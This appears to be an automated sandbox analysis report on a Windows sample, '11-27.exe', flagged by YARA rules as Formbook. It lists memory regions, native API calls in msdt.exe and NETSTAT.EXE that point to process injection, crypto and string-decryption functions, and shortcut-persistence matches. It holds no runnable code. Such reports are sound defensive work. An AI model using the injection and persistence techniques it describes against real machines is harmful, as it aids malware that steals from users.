Source: 00000007.00000002.411551664.0000000000450000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.411551664.0000000000450000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.420984310.0000000003280000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.420984310.0000000003280000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.433927782.0000000003290000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.433927782.0000000003290000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.420714851.00000000030C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.420714851.00000000030C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.433471345.0000000003000000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.433471345.0000000003000000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.421063196.00000000032B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.421063196.00000000032B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.436004947.00000000051EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.436004947.00000000051EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.416656811.00000000032A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.416656811.00000000032A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.416715788.00000000032D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.416715788.00000000032D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.419388564.00000000051EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.419388564.00000000051EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.433805167.0000000003260000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.433805167.0000000003260000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.604691451.00000000002E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.604691451.00000000002E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Contains functionality to call native functions

Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049195D0 NtClose,LdrInitializeThunk,	6_2_049195D0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919540 NtReadFile,LdrInitializeThunk,	6_2_04919540
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919560 NtWriteFile,LdrInitializeThunk,	6_2_04919560
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049196D0 NtCreateKey,LdrInitializeThunk,	6_2_049196D0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049196E0 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_049196E0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919610 NtEnumerateValueKey,LdrInitializeThunk,	6_2_04919610
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919650 NtQueryValueKey,LdrInitializeThunk,	6_2_04919650
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919660 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_04919660
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919780 NtMapViewOfSection,LdrInitializeThunk,	6_2_04919780
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919FE0 NtCreateMutant,LdrInitializeThunk,	6_2_04919FE0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919710 NtQueryInformationToken,LdrInitializeThunk,	6_2_04919710
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919770 NtSetInformationFile,LdrInitializeThunk,	6_2_04919770
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919840 NtDelayExecution,LdrInitializeThunk,	6_2_04919840
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919860 NtQuerySystemInformation,LdrInitializeThunk,	6_2_04919860
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049199A0 NtCreateSection,LdrInitializeThunk,	6_2_049199A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919910 NtAdjustPrivilegesToken,LdrInitializeThunk,	6_2_04919910
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919A50 NtCreateFile,LdrInitializeThunk,	6_2_04919A50
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049195F0 NtQueryInformationFile,	6_2_049195F0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0491AD30 NtSetContextThread,	6_2_0491AD30
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919520 NtWaitForSingleObject,	6_2_04919520
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919670 NtQueryInformationProcess,	6_2_04919670
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049197A0 NtUnmapViewOfSection,	6_2_049197A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0491A710 NtOpenProcessToken,	6_2_0491A710
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919730 NtQueryVirtualMemory,	6_2_04919730
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0491A770 NtOpenThread,	6_2_0491A770
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919760 NtOpenProcess,	6_2_04919760
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049198A0 NtWriteVirtualMemory,	6_2_049198A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049198F0 NtReadVirtualMemory,	6_2_049198F0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919820 NtEnumerateKey,	6_2_04919820
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0491B040 NtSuspendThread,	6_2_0491B040
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049199D0 NtCreateProcessEx,	6_2_049199D0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919950 NtQueueApcThread,	6_2_04919950
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919A80 NtOpenDirectoryObject,	6_2_04919A80
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919A10 NtQuerySection,	6_2_04919A10
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919A00 NtProtectVirtualMemory,	6_2_04919A00
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919A20 NtResumeThread,	6_2_04919A20
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0491A3B0 NtGetContextThread,	6_2_0491A3B0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919B00 NtSetValueKey,	6_2_04919B00
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_02AAA060 NtClose,	6_2_02AAA060
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_02AAA110 NtAllocateVirtualMemory,	6_2_02AAA110
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_02AA9FE0 NtReadFile,	6_2_02AA9FE0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_02AA9F30 NtCreateFile,	6_2_02AA9F30
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_02AAA10C NtAllocateVirtualMemory,	6_2_02AAA10C
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_02AA9F82 NtReadFile,	6_2_02AA9F82
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_02AA9F2A NtCreateFile,	6_2_02AA9F2A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09860 NtQuerySystemInformation,LdrInitializeThunk,	7_2_02D09860
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09910 NtAdjustPrivilegesToken,LdrInitializeThunk,	7_2_02D09910
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D096E0 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_02D096E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09660 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_02D09660
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09FE0 NtCreateMutant,LdrInitializeThunk,	7_2_02D09FE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D095D0 NtClose,LdrInitializeThunk,	7_2_02D095D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09A80 NtOpenDirectoryObject,	7_2_02D09A80
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09A50 NtCreateFile,	7_2_02D09A50
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09A10 NtQuerySection,	7_2_02D09A10
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09A00 NtProtectVirtualMemory,	7_2_02D09A00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09A20 NtResumeThread,	7_2_02D09A20
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D0A3B0 NtGetContextThread,	7_2_02D0A3B0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09B00 NtSetValueKey,	7_2_02D09B00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D098F0 NtReadVirtualMemory,	7_2_02D098F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D098A0 NtWriteVirtualMemory,	7_2_02D098A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D0B040 NtSuspendThread,	7_2_02D0B040
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09840 NtDelayExecution,	7_2_02D09840
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09820 NtEnumerateKey,	7_2_02D09820
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D099D0 NtCreateProcessEx,	7_2_02D099D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D099A0 NtCreateSection,	7_2_02D099A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09950 NtQueueApcThread,	7_2_02D09950
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D096D0 NtCreateKey,	7_2_02D096D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09650 NtQueryValueKey,	7_2_02D09650
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09670 NtQueryInformationProcess,	7_2_02D09670
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09610 NtEnumerateValueKey,	7_2_02D09610
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09780 NtMapViewOfSection,	7_2_02D09780
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D097A0 NtUnmapViewOfSection,	7_2_02D097A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D0A770 NtOpenThread,	7_2_02D0A770
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09770 NtSetInformationFile,	7_2_02D09770
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09760 NtOpenProcess,	7_2_02D09760
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D0A710 NtOpenProcessToken,	7_2_02D0A710
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09710 NtQueryInformationToken,	7_2_02D09710
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09730 NtQueryVirtualMemory,	7_2_02D09730
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D095F0 NtQueryInformationFile,	7_2_02D095F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09540 NtReadFile,	7_2_02D09540
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09560 NtWriteFile,	7_2_02D09560
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D0AD30 NtSetContextThread,	7_2_02D0AD30
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09520 NtWaitForSingleObject,	7_2_02D09520
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0046A060 NtClose,	7_2_0046A060
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0046A110 NtAllocateVirtualMemory,	7_2_0046A110
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_00469F30 NtCreateFile,	7_2_00469F30
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_00469FE0 NtReadFile,	7_2_00469FE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0046A10C NtAllocateVirtualMemory,	7_2_0046A10C
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_00469F2A NtCreateFile,	7_2_00469F2A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_00469F82 NtReadFile,	7_2_00469F82

Detected potential crypto function

Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_02B1A4F4	0_3_02B1A4F4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Code function: 5_3_02AEA4F4	5_3_02AEA4F4
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048E841F	6_2_048E841F
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0499D466	6_2_0499D466
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04902581	6_2_04902581
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049A25DD	6_2_049A25DD
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048ED5E0	6_2_048ED5E0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049A2D07	6_2_049A2D07
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048D0D20	6_2_048D0D20
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049A1D55	6_2_049A1D55
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049A2EF7	6_2_049A2EF7
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0499D616	6_2_0499D616
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048F6E30	6_2_048F6E30
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049ADFCE	6_2_049ADFCE
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049A1FF1	6_2_049A1FF1
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048EB090	6_2_048EB090
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049020A0	6_2_049020A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049A20A8	6_2_049A20A8
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049A28EC	6_2_049A28EC
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04991002	6_2_04991002
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049AE824	6_2_049AE824
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048DF900	6_2_048DF900
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048F4120	6_2_048F4120
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049A22AE	6_2_049A22AE
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0490EBB0	6_2_0490EBB0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049903DA	6_2_049903DA
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0499DBD2	6_2_0499DBD2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049A2B28	6_2_049A2B28
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_02AAEA4D	6_2_02AAEA4D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_02A99E3B	6_2_02A99E3B
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_02A99E40	6_2_02A99E40
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_02A92FB0	6_2_02A92FB0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_02AAE4E0	6_2_02AAE4E0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_02A92D90	6_2_02A92D90
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D8E2C5	7_2_02D8E2C5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D84AEF	7_2_02D84AEF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D932A9	7_2_02D932A9
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D922AE	7_2_02D922AE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D85A4F	7_2_02D85A4F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEB236	7_2_02CEB236
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D7FA2B	7_2_02D7FA2B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D803DA	7_2_02D803DA
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D8DBD2	7_2_02D8DBD2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CFABD8	7_2_02CFABD8
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D723E3	7_2_02D723E3
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D18BE8	7_2_02D18BE8
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF138B	7_2_02CF138B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEEB9A	7_2_02CEEB9A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D6EB8A	7_2_02D6EB8A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CFEBB0	7_2_02CFEBB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEAB40	7_2_02CEAB40
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D6CB4F	7_2_02D6CB4F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CE3360	7_2_02CE3360
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D8231B	7_2_02D8231B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEA309	7_2_02CEA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D92B28	7_2_02D92B28
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D860F5	7_2_02D860F5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D928EC	7_2_02D928EC
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CDB090	7_2_02CDB090
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF20A0	7_2_02CF20A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D920A8	7_2_02D920A8
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC6800	7_2_02CC6800
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF701D	7_2_02CF701D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D81002	7_2_02D81002
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D9E824	7_2_02D9E824
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEA830	7_2_02CEA830
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CDC1C0	7_2_02CDC1C0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CE2990	7_2_02CE2990
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CE99BF	7_2_02CE99BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CCF900	7_2_02CCF900
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CE4120	7_2_02CE4120
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D92EF7	7_2_02D92EF7
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D71EB6	7_2_02D71EB6
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D4AE60	7_2_02D4AE60
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D8D616	7_2_02D8D616
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CE5600	7_2_02CE5600
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CE6E30	7_2_02CE6E30
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D9DFCE	7_2_02D9DFCE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D91FF1	7_2_02D91FF1
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D867E2	7_2_02D867E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF4CD4	7_2_02CF4CD4
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D84496	7_2_02D84496
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEB477	7_2_02CEB477
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D8D466	7_2_02D8D466
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CD841F	7_2_02CD841F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CE2430	7_2_02CE2430
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D925DD	7_2_02D925DD
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CDD5E0	7_2_02CDD5E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF2581	7_2_02CF2581
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D82D82	7_2_02D82D82
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF65A0	7_2_02CF65A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D91D55	7_2_02D91D55
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CE2D50	7_2_02CE2D50
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D92D07	7_2_02D92D07
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC0D20	7_2_02CC0D20
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0046EA4D	7_2_0046EA4D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0046E4E0	7_2_0046E4E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_00452D90	7_2_00452D90
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_00459E40	7_2_00459E40
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_00459E3B	7_2_00459E3B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_00452FB0	7_2_00452FB0

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: String function: 02CCB150 appears 159 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: String function: 02D1D08C appears 47 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: String function: 02D55720 appears 81 times
Source: C:\Windows\SysWOW64\msdt.exe	Code function: String function: 048DB150 appears 45 times

PE / OLE file has an invalid certificate

Source: 11-27.exe

Static PE information: invalid certificate

PE file contains strange resources

Source: 11-27.exe	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: 11-27.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Hmptdrv.exe.0.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Hmptdrv.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Sample file is different than original file name gathered from version info

Source: 11-27.exe, 00000000.00000002.424908083.00000000056DF000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 11-27.exe
Source: 11-27.exe, 00000000.00000002.421533120.0000000004B10000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs 11-27.exe
Source: 11-27.exe, 00000000.00000002.421469900.0000000004AF0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamenlsbres.dllj% vs 11-27.exe
Source: 11-27.exe, 00000000.00000002.415590971.0000000002310000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamecomctl32.DLL.MUIj% vs 11-27.exe
Source: 11-27.exe, 00000000.00000002.415732009.0000000002400000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs 11-27.exe
Source: 11-27.exe, 00000000.00000002.420907601.0000000003170000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamenetstat.exej% vs 11-27.exe
Source: 11-27.exe, 00000000.00000002.421499515.0000000004B00000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs 11-27.exe
Source: 11-27.exe, 00000000.00000002.415547343.00000000022F0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs 11-27.exe

Yara signature match

Source: 00000005.00000002.430498820.0000000002E67000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000005.00000002.430498820.0000000002E67000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000000.00000002.420259807.0000000002E97000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
